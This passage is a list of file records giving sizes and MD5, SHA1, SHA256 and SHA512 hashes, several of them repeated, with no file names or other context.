SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
5.3MB
MD5b3ea90374e04afa4e2f8f250085b91d1
SHA1cf81d2a90aad0c687428ad572a80cf5ee554195b
SHA256f757692342fb8eefe302aee9882a14a44db62a87a75d755cfa6b1fbc1448c34a
SHA51255e1a7c2c8d4090205d97f23540da5ead499fbd1948451a8569a0a19d7127fffb832b5b416a5aa0e469c6e4dfd11ca32d97e208bdd05838348e350b879d1d205
-
Filesize
5.3MB
MD5b3ea90374e04afa4e2f8f250085b91d1
SHA1cf81d2a90aad0c687428ad572a80cf5ee554195b
SHA256f757692342fb8eefe302aee9882a14a44db62a87a75d755cfa6b1fbc1448c34a
SHA51255e1a7c2c8d4090205d97f23540da5ead499fbd1948451a8569a0a19d7127fffb832b5b416a5aa0e469c6e4dfd11ca32d97e208bdd05838348e350b879d1d205
-
Filesize
352KB
MD5d0d1f3929034eac4a7ad206ea225c749
SHA109e66d4b585a1089596b1178c500485e5a793e89
SHA2560f04071dc6a1e63e07cafa4ff2ef0b41c3926bafb97dfa5ac816fcf24d441324
SHA512d2b405ad9c6b58709bc81c4fafe3945ef0cb3eb62f2d701588207936a422cc5f0441412c149a5fe1630fd9303a11c31225acb7b02d7b71cb2f0333fc778b015b
-
Filesize
352KB
MD5d0d1f3929034eac4a7ad206ea225c749
SHA109e66d4b585a1089596b1178c500485e5a793e89
SHA2560f04071dc6a1e63e07cafa4ff2ef0b41c3926bafb97dfa5ac816fcf24d441324
SHA512d2b405ad9c6b58709bc81c4fafe3945ef0cb3eb62f2d701588207936a422cc5f0441412c149a5fe1630fd9303a11c31225acb7b02d7b71cb2f0333fc778b015b
-
Filesize
337KB
MD5fda3ce0309e1698e62e41f3fcb79204e
SHA1cef492a6d5af778041b317b52f6988f7eb5f445e
SHA256ae8a3d5ac34fc1d64c1ae052cdbb5cbb05910e4aafb7bb2178eecc412254caaa
SHA512b8eca49fc630924f1888b2a91bf6a9c6bae85c5b0541ced8b84370f4550dc23d2b19c910420898dd6cfcffe98c7abd9cc29bc166d754bd3ffb04a2f887307cfd
-
Filesize
337KB
MD5fda3ce0309e1698e62e41f3fcb79204e
SHA1cef492a6d5af778041b317b52f6988f7eb5f445e
SHA256ae8a3d5ac34fc1d64c1ae052cdbb5cbb05910e4aafb7bb2178eecc412254caaa
SHA512b8eca49fc630924f1888b2a91bf6a9c6bae85c5b0541ced8b84370f4550dc23d2b19c910420898dd6cfcffe98c7abd9cc29bc166d754bd3ffb04a2f887307cfd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
204KB
MD53f225999f85e5321ef6e0bbd536525e0
SHA1204da3784c50834834d3971b7b3ffe3664fe1705
SHA256e75d5bc7cf1bedd14a0739593b7058e6d2f2a612c25c78e492ff4d190928f6ad
SHA512d4beda4552f8fe858ce9ca96c4666bc32fa6b2730fab8447acad24dead09802f35db1aae411d8618c5cfe556a6f0715ce4bd308306fb232548d89d98a3face78
-
Filesize
204KB
MD53f225999f85e5321ef6e0bbd536525e0
SHA1204da3784c50834834d3971b7b3ffe3664fe1705
SHA256e75d5bc7cf1bedd14a0739593b7058e6d2f2a612c25c78e492ff4d190928f6ad
SHA512d4beda4552f8fe858ce9ca96c4666bc32fa6b2730fab8447acad24dead09802f35db1aae411d8618c5cfe556a6f0715ce4bd308306fb232548d89d98a3face78
-
Filesize
204KB
MD53f225999f85e5321ef6e0bbd536525e0
SHA1204da3784c50834834d3971b7b3ffe3664fe1705
SHA256e75d5bc7cf1bedd14a0739593b7058e6d2f2a612c25c78e492ff4d190928f6ad
SHA512d4beda4552f8fe858ce9ca96c4666bc32fa6b2730fab8447acad24dead09802f35db1aae411d8618c5cfe556a6f0715ce4bd308306fb232548d89d98a3face78
-
Filesize
465.3MB
MD59a24913a3e28a07db652ec54862c322f
SHA12de692f672819d9c9c4a9f9457b674d7b2175456
SHA2560a3ed4a50c939297f717d84d2727ee1443aa4e25ae7ed2d73c4076909d4aa51c
SHA51280628e27299d941bef93538eca72f62c8cd9cd4fda65a83ea3c1a5cb3628c0a01e393bf8393c7cb6c08a85f724cdab96a6c193b60e15dcde0d7089557704b211
-
Filesize
475.6MB
MD5eb6baaae133aba8fa8e0e3ef14caa0da
SHA1affb1770f860e82f222dffb4fbe027367227b3ad
SHA25686205420a85d110f0e6a9299bfb6551ea973adac88d2b8aaf836dc6e1adeb3c9
SHA5124db5a4d09ad38a1785fb2adfc17f9a5610b93404f4540f60bb59d7202fe94dfd66acab75b1f46c7fd5a14e03c7ebe115b5fdfe20560a447a005ddf964d06e917
-
Filesize
352KB
MD52115cc47f7ef6e7152e2326de4f32f2a
SHA1ed68fa31b9f635cdeb3a26710c2ec9689dcb8f97
SHA2566ae23d8550d0f10cd34797e5821fd78a2d50236e9f8a931a398f8f26daffbfad
SHA5121c3727cfa39dc010dec742f0f98eba3d881a7802ed59c28b74daa514b71dee8e62e8ba21514ecb2bd9ae3a765b4d029f29ceee1f2865714c10255d6820811012
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
138B
MD5c92880ea18379d6a4b0478e2e65cbbe8
SHA13724c3b04596169407c0ac9f574edc23156efa7b
SHA2565a1cefdffa08e82d667a021a0c5cd27ab559bbc596f4847e3d0a892f862dc903
SHA5126b159d6597a9c46f41a8b4fbcb40cfd2c0988339e4582e95660f11ca2a608872cb39aa320d250a9c809a7e016e11c3a5d55d15ae6d929fa0969ffb1c2566d1b0